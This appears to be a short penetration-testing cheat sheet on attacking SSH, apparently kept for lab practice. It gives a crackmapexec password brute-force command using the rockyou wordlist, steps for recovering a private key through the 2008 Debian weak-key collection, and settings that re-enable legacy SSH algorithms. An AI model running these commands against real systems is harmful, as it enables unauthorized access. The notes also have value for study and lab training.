# ssh 22

## ssh 22

* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\***Bruteforcing credentials using** crackmapexec ssh 10.11.1.251 -u \<user> -p /usr/share/wordlists/rockyou.txt
* If machine is running on very old linux , and in 2008 , ssh public and private keys are publically available . since authorized\_key has public key , it can be used to find private key
  * git clone <https://github.com/g0tmi1k/debian-ssh>
  * cd debian-ssh/common\_keys/
  * tar -vjxf debian\_ssh\_dsa\_1024\_x86.tar.bz2
  * cd dsa/1024
  * grep -lr “<20 charac from authorizedkey>”
  * got private key
* if there is any error try
  * configure **/etc/ssh/ssh\_config**
    * add line in the end **PubkeyAcceptedKeyTypes +ssh-dss**
  * use arguments like this with ssh command if there is any error -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss